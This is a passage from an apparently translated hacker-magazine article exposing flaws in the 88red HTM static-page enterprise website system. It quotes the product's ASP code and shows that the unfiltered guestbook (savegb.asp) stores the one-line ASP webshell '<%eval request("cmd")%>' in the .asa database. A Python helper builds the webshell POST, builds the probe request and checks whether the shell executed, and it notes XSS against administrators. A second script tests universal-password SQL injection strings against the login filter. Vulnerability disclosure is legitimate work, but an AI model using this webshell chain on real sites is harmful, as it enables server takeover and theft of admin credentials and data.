Exposing vulnerabilities in the 88red HTM static page generation enterprise website system (page 1/2)
Author: Xiao (xsser) @ [0.s.t]
This article was published in Hacker Manual, issue 4. If you reprint it, please credit the source or link to http://blog.0kee.com/xiaoshuai (xiaoshuai's blog).
I haven't been to as300 for a long time. Apologies to the site for the traffic this post will bring, and apologies to the many Hacker Manual readers who kept asking for it (don't throw eggs, throw money!). Having talked myself up this far, I have to follow through. When I downloaded the code I thought it looked pretty good, and the vendor thinks even more of it than I do. Here is their description:

88red HTM static page generation system V3.0 has been developed and officially released. It integrates a site map, an enterprise news center, enterprise products, search, a customer message board, downloads and a voting system, basically covering the functions an enterprise site needs. Its static page generation gives enterprise websites the greatest help in optimizing their search engine ranking (SEO). The system has a newly designed look that is closer to what an enterprise website needs.

Let the facts speak.

1. Unfiltered message board

Opening the directory, I found conn.asp, config.asp and other files. There is nothing special in config.asp. conn.asp has error suppression (that is, it prevents the database path from being disclosed through error messages). No problem? Let's look at conn.asp anyway:
<%
On Error Resume Next          ' swallow errors so no database path leaks in error pages
Dim conn
Dim connstr
Dim db
db = "Data/qiyedata.asa"      ' Access database stored with an .asa extension
Set conn = Server.CreateObject("ADODB.Connection")
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr
%>
Follow the vine to find the melon... what do we have here? The database is an .asa file. The first thing that came to mind was the one-line ASP webshell (the "one sentence" trojan). What can I reach it with, and how do I get the one-liner stored in the database? Users, messages, posts and so on, but I had already read that the root directory is static. Is writing HTML into a page an option? I was waiting for that idea, so I went to check the messages: the messages are static too. Alas! Fine, continue... There is a file named savegb.asp in the root directory. The name says it is the file that saves messages, so let's check its filtering. The fragment is as follows:
If Request.Form("Code") = "" Then      ' verification code empty: "hit you"
    Response.Write "<script language=JavaScript>alert('enter your name');this.location.href='javascript:history.go(-1)';</script>"
    Response.End
End If
If Request.Form("content") = "" Then   ' no message content, no right to speak
    Response.Write "<script language=JavaScript>alert('Enter the message content');this.location.href='javascript:history.go(-1)';</script>"
    Response.End
End If
Set rs = Server.CreateObject("ADODB.Recordset")   ' pass the two checks above and you reach the database
sql = "select * from GB"
rs.Open sql, conn, 3
Alas! Apart from including conn.asp at the top of the file there is no protection or filtering at all, which gives two results: 1st, write the one-liner straight into the database and get a shell; 2nd, XSS. The first method first: write the one-liner (assuming nothing in the database interferes with it), see Figure 1.

Then click Submit and the one-liner goes into the .asa database. I was testing on Xiaoxuanfeng (a local ASP server), which does not parse .asa files, so I renamed the database to .asp; the principle is the same. See Figure 2.
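Before moving on, here is an offline helper for the step just described. It is an added example, not code from the article or from 88red: it builds the savegb.asp form body carrying the classic one-line ASP webshell, and classifies what comes back when the database file that conn.asp points at (Data/qiyedata.asa) is requested directly. The field name "name" and the probe style for driving an eval shell are assumptions; "Code" and "content" and the database path come from the snippets above.

```python
"""
Added example (not the article's or 88red's own code).

Classifies the body returned by GET /Data/qiyedata.asa after the one-liner
has been posted through the message board. Three outcomes matter:

  executed   - IIS ran the .asa as ASP and our eval produced the probe marker
               (everything outside <% %> in the file is still echoed, so the
               marker must be checked before the database header)
  served_raw - the Jet/ACE database header is at offset 4 and the <% %> text
               reached the client unevaluated: the database is downloadable
               but the shell did not run (not mapped to asp.dll, or stored in a
               form the parser does not see)
  unknown    - error page, 404, blocked, etc.
"""
from urllib.parse import urlencode

DB_PATH = "Data/qiyedata.asa"            # from conn.asp
JET_MAGIC = b"Standard Jet DB"           # Access 97-2003 (Jet 4) file header, at offset 4
ACE_MAGIC = b"Standard ACE DB"           # Access 2007+ (.accdb) file header, at offset 4


def one_liner(param: str = "cmd") -> str:
    """The classic one-line ASP webshell: evaluates whatever arrives in `param`."""
    return '<%eval request("' + param + '")%>'


def build_message_post(payload: str, code: str, name: str = "test") -> bytes:
    """
    Form body for savegb.asp. The page only checks that `Code` (captcha) and
    `content` are non-empty; the `name` field is an assumption about the form.
    """
    return urlencode({"name": name, "content": payload, "Code": code}).encode()


def probe_query(param: str, marker: str) -> str:
    """
    Query string that makes an eval shell write `marker` into the response.
    Execute(...) inside eval is the usual way to run a statement through an
    eval-based shell (assumption about the target's VBScript behaviour).
    """
    stmt = 'Execute("Response.Write(""%s"")")' % marker
    return urlencode({param: stmt})


def _has_db_header(body: bytes) -> bool:
    return body[4:4 + len(JET_MAGIC)] in (JET_MAGIC, ACE_MAGIC)


def classify_db_response(body: bytes, payload: str, marker: str) -> str:
    """See module docstring. `payload` is the exact text that was posted."""
    if marker.encode() in body:
        return "executed"
    if _has_db_header(body):
        if payload.encode() in body:
            return "served_raw"                 # ASCII tags visible, not evaluated
        if payload.encode("utf-16-le") in body:
            return "served_raw_unicode"         # Jet stored the text as Unicode
        return "served_raw_no_payload"          # database served, payload not in it
    return "unknown"


if __name__ == "__main__":
    # Constructed sample responses (not captured from a real server).
    p = one_liner()
    fake_db = b"\x00\x01\x00\x00" + JET_MAGIC + b"\x00" * 24
    print(classify_db_response(fake_db + p.encode(), p, "X7M"))            # served_raw
    print(classify_db_response(fake_db + b"X7M", p, "X7M"))                # executed
    print(build_message_post(p, code="1234"))
    print(probe_query("cmd", "X7M"))
```

Run the message POST first, then request DB_PATH with probe_query appended; a served_raw result still means the whole Access file, admin hashes included, can be downloaded, which is worth reporting even when the shell does not fire.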
So we can get the one-liner into the database and then go on to privilege escalation and so on. 2nd, XSS. With XSS one should immediately think of ways to get a webshell, for example riding the administrator's session to perform actions; getting a webshell through XSS has already been written up by someone more capable, so let's look at the backend instead. The backend authentication is fine: at least our universal password (the ' or '1'='1 style login bypass) is no longer universal. The snippet is as follows:
theadmin = Replace(Trim(Request("user")), "'", "")   ' trims surrounding spaces and removes single quotes
pass = Replace(Trim(Request("pass")), "'", "")       ' same filtering as above
Set rs = Server.CreateObject("ADODB.Recordset")
sql = "select * from Admin where admname='" & theadmin & "'"   ' then query the database
rs.Open sql, conn, 1, 3
If rs.EOF Then
    Response.Write "<script language='javascript'>alert('Sorry, this user does not exist!');window.location.href='login.asp';</script>"
    Response.End
Else
    pass1 = rs("admpass")
    If pass1 = MD5(pass) Then             ' password is compared in script, not in SQL
        Session("admin") = rs("admname")
        Response.Redirect "Main.asp"
    Else
        Response.Write "<script language='javascript'>alert('Sorry, the password is incorrect!');window.location.href='login.asp';</script>"
    End If
End If
rs.Close
Set rs = Nothing
conn.Close
Set conn = Nothing
If you don't read carefully you will be stopped right here by the single-quote filter. One of our routes is getting into the backend, so let's keep reading code and sort out the train of thought for convenience: lax message filtering -> one-liner into the database -> XSS -> backend authentication is fine, can't get in -> look at the included configuration file.

2. Following vulnerability 1 to a webshell

We log in with the default password to inspect the backend. This is white-box testing, so looking through the admin panel for a way to a webshell is a fair test. Skipping the idle talk: take a careful look at the edit prompt, see Figure 3.
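To back up the conclusion that the login snippet above is not open to the universal-password bypass, here is an added example (not the article's or 88red's code): a Python port of the Replace(Trim(...), "'", "") filter, run against the usual payloads, with a check that the quoted literal in the Admin query stays intact. It goes one step beyond the page: a hypothetical numeric-context query shows why quote stripping is only sufficient because the parameter sits inside a string literal.

```python
"""
Added example (not the article's or 88red's own code).

Ports the login page's single-quote stripping to Python and checks whether the
classic universal-password payloads can still break out of the quoted literal
in  select * from Admin where admname='<user>'.
"""
import re

# Constructed payloads, the usual login-bypass strings.
UNIVERSAL_PASSWORDS = [
    "' or '1'='1",
    "admin' or '1'='1",
    "' or 1=1 or '",
    "admin'--",
    "admin'#",
    "  ' or ''='  ",
]


def login_filter(value: str) -> str:
    """Replace(Trim(Request(...)), "'", ""): trim spaces, delete single quotes.
    Note it deletes rather than escapes, so a real name like O'Brien silently
    becomes OBrien; escaping by doubling the quote (or a parameterised query)
    would be the correct fix."""
    return value.strip().replace("'", "")


def admin_query(user: str) -> str:
    """The SQL the login page builds after filtering."""
    return "select * from Admin where admname='%s'" % login_filter(user)


def literal_is_intact(sql: str) -> bool:
    """True when the WHERE clause is still exactly one quoted literal.
    Jet SQL has no -- or # comment syntax either, so a trailing quote
    cannot be neutralised by commenting it out."""
    return re.fullmatch(r"select \* from Admin where admname='[^']*'", sql) is not None


def bypass_survives(user: str) -> bool:
    """Does this payload still escape the string literal after filtering?"""
    return not literal_is_intact(admin_query(user))


def numeric_query(id_value: str) -> str:
    """Hypothetical variant, NOT in 88red: same filter, numeric context."""
    return "select * from Admin where id=%s" % login_filter(id_value)


def numeric_bypass_survives(id_value: str) -> bool:
    """In a numeric context there is no quote to strip; 1 or 1=1 passes untouched."""
    return re.fullmatch(r"select \* from Admin where id=\d+", numeric_query(id_value)) is None


if __name__ == "__main__":
    for p in UNIVERSAL_PASSWORDS:
        print("%-22r -> %-55s bypass=%s" % (p, admin_query(p), bypass_survives(p)))
    print(numeric_query("1 or 1=1"), numeric_bypass_survives("1 or 1=1"))
```

The password never reaches SQL at all (it is compared against MD5(pass) in script), so the only injection point on the login page is the user name, and the stripping closes it here.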